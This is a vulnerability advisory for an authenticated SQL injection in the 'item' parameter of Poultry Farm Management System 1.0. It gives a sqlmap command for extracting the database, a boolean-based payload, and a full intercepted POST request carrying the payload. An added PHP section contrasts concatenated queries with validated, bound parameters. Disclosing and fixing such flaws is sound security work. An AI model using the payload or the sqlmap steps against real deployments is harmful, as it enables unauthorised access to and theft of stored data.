SQL Injection For Poultry Farm Management system 1.0
# Exploit Title: Poultry Farm Management System 1.0 - 'item' SQL Injection (Authenticated)
# Date: 2022-25-03
# Exploit Author: Ibrahim Ekim Isik
# Vendor Homepage: https://www.sourcecodester.com/php/15230/poultry-farm-management-system-free-download.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/Redcock-Farm.zip
# Version: 1.0
# Tested on: Windows 10 Pro + PHP 8.0.11, Apache 2.4.51
------------------------------------------------------------------------------------
1. Description:
----------------------
Poultry Farm Management System 1.0 allows SQL Injection via parameter 'item' in
/Redcock-Farm/farm/store.php. Exploiting this issue could allow an attacker to compromise
the application, access or modify data, or exploit latent vulnerabilities
in the underlying database.
2. Proof of Concept:
----------------------
In Burp Suite, intercept the request from the affected page that carries the
'item' parameter and save it as poc.txt. Then run sqlmap to extract the
data from the database:
sqlmap -r poc.txt --dbms=mysql
3. Example payload:
----------------------
(boolean based)
-1+OR+17-7%3d10
4. Burp Suite request:
----------------------
POST /Redcock-Farm/farm/store.php HTTP/1.1
Host: localhost
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Content-Length: 407
Content-Type: multipart/form-data; boundary=e4859a5b5a1543d7962cf80e9e6b67b6
Cookie: PHPSESSID=o6t9s6hag9pu014fch5g4ge5i3
Referer: http://localhost/Redcock-Farm/farm/store.php
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36

--e4859a5b5a1543d7962cf80e9e6b67b6
Content-Disposition: form-data; name="item"

-1 OR 17-7=10
--e4859a5b5a1543d7962cf80e9e6b67b6
Content-Disposition: form-data; name="date"

01/01/2011
--e4859a5b5a1543d7962cf80e9e6b67b6
Content-Disposition: form-data; name="quantity"

3
--e4859a5b5a1543d7962cf80e9e6b67b6
Content-Disposition: form-data; name="save"

3
--e4859a5b5a1543d7962cf80e9e6b67b6--
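
5. Remediation example (added):
----------------------
The following is an added example, not code from Redcock-Farm or from the advisory author. It contrasts a query built by concatenating the 'item' value with one that validates the value as an integer and binds it as a typed parameter. The `store` table, its columns and the function names are hypothetical, and an in-memory SQLite database through PDO stands in for MySQL so the script runs offline.

```php
<?php
declare(strict_types=1);

// Constructed schema and rows (hypothetical; the page does not show store.php's tables).
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE store (id INTEGER PRIMARY KEY, item_id INTEGER, quantity INTEGER)');
$pdo->exec('INSERT INTO store (item_id, quantity) VALUES (1, 10), (2, 25), (3, 7)');

// Vulnerable pattern: the request value is concatenated into the SQL text,
// so the database parses it as part of the WHERE expression.
function lookupConcatenated(PDO $pdo, string $item): array
{
    $sql = 'SELECT id, item_id, quantity FROM store WHERE item_id = ' . $item;
    return $pdo->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// Hardened pattern: reject anything that is not an integer, then bind the
// value as a typed parameter so it can never change the query structure.
function lookupBound(PDO $pdo, string $item): array
{
    $id = filter_var($item, FILTER_VALIDATE_INT);
    if ($id === false) {
        throw new InvalidArgumentException('item must be an integer');
    }
    $stmt = $pdo->prepare('SELECT id, item_id, quantity FROM store WHERE item_id = :item');
    $stmt->bindValue(':item', $id, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

$fromPage = '-1 OR 17-7=10'; // the 'item' value from the request on this page

// Compare row counts: a legitimate id versus the value from the request above.
printf("concatenated, item=2:     %d row(s)\n", count(lookupConcatenated($pdo, '2')));
printf("concatenated, page value: %d row(s)\n", count(lookupConcatenated($pdo, $fromPage)));
printf("bound, item=2:            %d row(s)\n", count(lookupBound($pdo, '2')));
try {
    lookupBound($pdo, $fromPage);
} catch (InvalidArgumentException $e) {
    printf("bound, page value:        rejected (%s)\n", $e->getMessage());
}
```

With MySQL the same pattern applies through PDO or mysqli prepared statements; the integer check alone is not a substitute for binding, since other parameters in the same form may not be numeric.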